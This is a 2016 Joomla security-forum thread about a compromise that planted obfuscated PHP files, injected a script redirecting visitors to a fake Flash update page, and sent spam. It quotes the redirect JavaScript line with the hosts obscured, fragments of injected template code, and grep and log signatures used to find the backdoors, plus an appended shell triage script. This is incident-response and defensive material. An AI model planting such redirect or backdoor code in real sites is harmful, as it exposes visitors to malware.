";} /*B6D1B1EE*/ ?> at top of site

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

MiscCoder
Joomla! Fledgling
Posts: 4
Joined: Tue Aug 30, 2016 2:30 pm

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by MiscCoder » Fri Sep 02, 2016 1:14 pm

fcoulter wrote: If you load the URL http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600, i.e. with a time zone and screen dimensions, then actually it returns this javascript

Code:

window.open('http://************.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');
That URL which I have obscured is a fake Adobe update site; it is most likely trying to produce a fake Flash update notice to try to trick users into downloading malware. If it is not working then that is just good luck on our part.
This might be a new development, the other day it was just returning the exact same JS that called that URL in the first place.

edit: Actually I'm still just getting the same JS. Oh well.

fcoulter
Joomla! Ace
Posts: 1685
Joined: Thu Sep 13, 2007 11:39 am
Location: UK

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by fcoulter » Fri Sep 02, 2016 2:27 pm

It may be that it is designed to only return the fake Adobe update at random times; I think that this rather convoluted method of loading the malware is intended to try and generate confusion so that it is not picked up by malware scanners.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"

maironrozendo
Joomla! Fledgling
Posts: 1
Joined: Fri Sep 02, 2016 5:18 pm

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by maironrozendo » Fri Sep 02, 2016 5:29 pm

harps_kal wrote:
rogeriovaz wrote: Hi guys,
I have been affected by this injection as well and it seems that in some way javascript files and php files were created. At the beginning I reacted as you did; however, I realised that the website is sending emails constantly to all clients and employees.
Has someone found a solution for it?
Follow my FPA
The same for me,

The attacker was using an HTTP POST to /libraries/phpxmlrpc/compat/article48.php to send spam mail.

They also changed the modified date of article48.php so that it wasn't obvious.

Also got some spam email from this forum as soon as I registered.

While I work out what to do I'm using a static rip of the joomla site.
Hi harps_kal

How do you stop it sending spam mail?

I have over 300 websites and about 10 of them have been contaminated.

I use Plesk Panel and I work with a host. I'm turning off PHP and notifying customers.

Best Regards

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Fri Sep 02, 2016 5:31 pm

fcoulter wrote: Actually I did some more testing, and it seems that the script injected into mod_stats may not be so harmless.

It seems to try to get information about the time zone and screen dimensions and then load itself again with that information supplied in the URL.

If you load the URL http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600, i.e. with a time zone and screen dimensions, then actually it returns this javascript

Code:

window.open('http://************.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');
That URL which I have obscured is a fake Adobe update site; it is most likely trying to produce a fake Flash update notice to try to trick users into downloading malware. If it is not working then that is just good luck on our part.
This makes sense as the other day a fake Flash update page had loaded, but I had multiple tabs open at the time so it was tough to tell where it came from. This explains it though.

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Fri Sep 02, 2016 9:31 pm

Just noticed also in:

modules/mod_stats

There is a new file called:

jstats.php

Hopefully this sheds more light on things

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Tue Sep 13, 2016 8:56 pm

I just wanted to follow this up.
Whatever script was added to my site, something happened today, it tried running it from some new code in my template index file:

language=JavaScript id=onDate
language=JavaScript src=/media/system/js/stat052.php
";};$0520cee5=1; ?

But because I had already deleted the media/system/js/stat052.php file it didn't work and instead gave the site 500 errors when trying to access it.

Hope this helps someone.

nigelbb
Joomla! Apprentice
Posts: 39
Joined: Wed Aug 15, 2007 10:02 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by nigelbb » Wed Sep 21, 2016 3:14 pm

I just found this hack in a Joomla 1.5 site that I host. I found other JS infections too but was able to track down the bad files & replace them with known good copies with some relatively simple measures, so I am adding my experiences in the hope that this can help others similarly afflicted. I have root access to the site on a WHM/cPanel managed virtual server, so I logged in as root & issued this command, with results of similar form to this:

Code:

tail --lines=100 /usr/local/apache/logs/suphp_log
[Tue Sep 20 21:40:52 2016] [info] Executing "/home/websiteA/public_html/index.php" as UID 518, GID 514
[Tue Sep 20 21:41:12 2016] [info] Executing "/home/websiteB/public_html/index.php" as UID 533, GID 529
[Tue Sep 20 21:41:13 2016] [info] Executing "/home/websiteB/public_html/index.php" as UID 533, GID 529
[Tue Sep 20 21:41:49 2016] [info] Executing "/home/websiteB/public_html/index.php" as UID 533, GID 529
[Tue Sep 20 21:43:50 2016] [info] Executing "/home/websiteC/public_html/libraries/openid/Auth/OpenID/session57.php" as UID 551, GID 549
The bad JS is being run from the file libraries/openid/Auth/OpenID/session57.php on websiteC. I found several files buried deep that had plausible names but were not part of the Joomla installation. There were files in the root of the website with filenames like system.php or licence.php which again were not part of the Joomla installation.

The key way of identifying the bad files was that they all contained base64 encoded obfuscated JS & can generally be found by searching for any files containing the base64 decode string in a fashion similar to this:

Code:

grep -r '"64_decode";return' /home/websiteC/www/*
Of course replace websiteC etc by the WHM username for the account that hosts the website. Once you have seen one of the hacked files the signature is pretty distinctive.

I know that the website needs upgrading but it's run by a small non-profit using Joomfish for multilingual features plus an ancient Wordpress for Joomla plugin & some other photo gallery plugins. It would be impossible to upgrade to Joomla 3.6 & the only realistic option is eventually to start from scratch & replace it with a more easily managed Wordpress website which offers better security with minimal management. In the meantime all I can do is lock down the site as far as possible, adding the post 1.5.26 security patches & monitoring the site rigorously with lfd so I can step in at any sign that it's been hacked.
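The triage nigelbb describes (pull executed script paths out of suphp_log, then grep the webroot for the obfuscation signature) and harps_kal's observation that the attacker backdated the modified time of article48.php both lend themselves to a few reusable shell helpers. The block below is an added example, not code from the thread or from Joomla; the log lines and webroot it creates under a temp directory are constructed sample data, and the third helper goes one step beyond the posts by keying on ctime, which a forged mtime does not affect.

```shell
#!/bin/sh
# Added example, not code from the thread. Three triage helpers for the
# situation described above (nigelbb's suphp_log and grep approach, and
# harps_kal's note that the attacker backdated article48.php's mtime).
# Everything under "demo" is constructed sample data, not real server output.

# Executed scripts from suphp_log that are not a normal Joomla entry point.
# On a cPanel/suPHP host a legitimate Joomla 1.5 request is served by
# public_html/index.php, index2.php or administrator/index.php; any other
# .php file being executed directly (e.g. something under libraries/) is a
# candidate for inspection. Adjust the regex to your docroot layout.
suspicious_executions() {
    # $1: suphp_log file
    sed -n 's/.*Executing "\([^"]*\)".*/\1/p' "$1" \
      | grep -Ev '/public_html/(administrator/)?index2?\.php$' \
      | sort -u
}

# PHP files under a webroot containing a literal (fixed-string) signature.
files_with_signature() {
    # $1: directory to scan; $2: signature, e.g. '"64_decode";return'
    grep -rlF --include='*.php' -e "$2" "$1" 2>/dev/null | sort
}

# PHP files whose inode change time (ctime) is within the last N minutes.
# touch/utime can set mtime to any value, but ctime is updated by the kernel
# on every write, chmod or rename and cannot be set from user space, so a
# backdated mtime does not hide a file from this listing.
recently_changed() {
    # $1: directory; $2: minutes
    find "$1" -type f -name '*.php' -cmin "-$2" | sort
}

# --- demo with constructed data ---
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT

cat > "$demo_dir/suphp_log" <<'EOF'
[Tue Sep 20 21:40:52 2016] [info] Executing "/home/websiteA/public_html/index.php" as UID 518, GID 514
[Tue Sep 20 21:41:12 2016] [info] Executing "/home/websiteB/public_html/administrator/index.php" as UID 533, GID 529
[Tue Sep 20 21:43:50 2016] [info] Executing "/home/websiteC/public_html/libraries/openid/Auth/OpenID/session57.php" as UID 551, GID 549
[Tue Sep 20 21:44:07 2016] [info] Executing "/home/websiteC/public_html/libraries/openid/Auth/OpenID/session57.php" as UID 551, GID 549
EOF

mkdir -p "$demo_dir/www/libraries/openid/Auth/OpenID"
printf '<?php echo "clean"; ?>\n' > "$demo_dir/www/index.php"
# Mimics the obfuscation pattern: the function name is split so that a naive
# search for "base64_decode" misses it, but '"64_decode";return' is still there.
printf '<?php $f="base"."64_decode";return $f($payload); ?>\n' \
  > "$demo_dir/www/libraries/openid/Auth/OpenID/session57.php"

echo "Executed outside normal entry points:"
suspicious_executions "$demo_dir/suphp_log"
echo "Files carrying the signature:"
files_with_signature "$demo_dir/www" '"64_decode";return'
echo "PHP files changed (ctime) in the last 5 minutes:"
recently_changed "$demo_dir/www" 5
```

On a real host, point `suspicious_executions` at /usr/local/apache/logs/suphp_log and the other two at the account's webroot; the ctime listing is the one to run first after a cleanup, since it catches files the attacker re-touched to look old.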

fcoulter
Joomla! Ace
Posts: 1685
Joined: Thu Sep 13, 2007 11:39 am
Location: UK

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by fcoulter » Wed Sep 21, 2016 6:12 pm

The WordPress for Joomla plugin still exists and is available for J3.6: https://extensions.joomla.org/extension ... for-joomla so I don't think this should be a barrier to updating.

Migrating Joomfish content is more difficult, you might do better re-creating those using the Joomla language manager.

